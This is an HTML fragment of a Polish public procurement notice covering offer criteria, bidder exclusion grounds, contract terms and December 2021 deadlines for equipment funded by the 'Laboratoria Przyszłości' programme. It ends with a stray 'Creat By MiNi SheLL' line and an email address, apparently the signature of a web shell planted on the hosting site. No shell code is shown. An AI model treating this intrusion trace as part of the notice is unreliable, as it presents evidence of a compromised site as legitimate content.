class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która uzyskała największą liczbę punktów w oparciu o ustalone kryteria zostanie uznana na najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>Zamawiający nie wzywa do złożenia w/w podmiotowego środka dowodowego jeżeli jest w stanie pobrać go samemu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający na podstawie art. 104 UPzp, określa w formularzu ofertowym przedmiotowe<br/>środki dowodowe. Wykonawca zobowiązany jest dostarczyć Zamawiającemu wraz z ofertą opis<br/>oferowanych produktów wraz z podaniem nazw produktów. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W sytuacji, o której mowa w pkt 1 ppkt. 2, o których mowa w Rozdziale XI , Zamawiający wymaga złożenia wraz z ofertą oświadczenia (załącznik nr 5), o którym mowa w art. 117 ust. 4 UPzp oświadczenia, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy. Złożenie oświadczenia wymagane jest tylko w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przesłanki wykluczenia,<br/>o których mowa w Rozdziale VIII IDW, zostają spełnione na ogólnych zasadach. 3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie elektronicznej opatrzone podpisem kwalifikowanym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także<br/>złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniona przez upełnomocnionego<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenia, o których mowa w Rozdziale XI pkt 1 ppkt.1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały przewidziane we wzorze umowy będący załącznikiem do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie finansowane z &#34;Programu „LABORATORIA PRZYSZŁOŚCI” realizowany przez Ministerstwo Edukacji i Nauki we współpracy z Centrum GovTech w Kancelarii Prezesa Rady Ministrów finansowany<br/>z Funduszu Przeciwdziałania COVID-19.&#34;<br/><br/>2. Termin zakończenia zakresu umowy ustala się w okresie: 7 miesięcy od dnia zawarcia umowy, natomiast terminem pośrednim jest 30.12.2021 r. Wykonawca zobowiązany jest do dostarczenia 60 % oferowanego sprzętu w podanym pośrednim terminie.

Creat By MiNi SheLL
Email: jattceo@gmail.com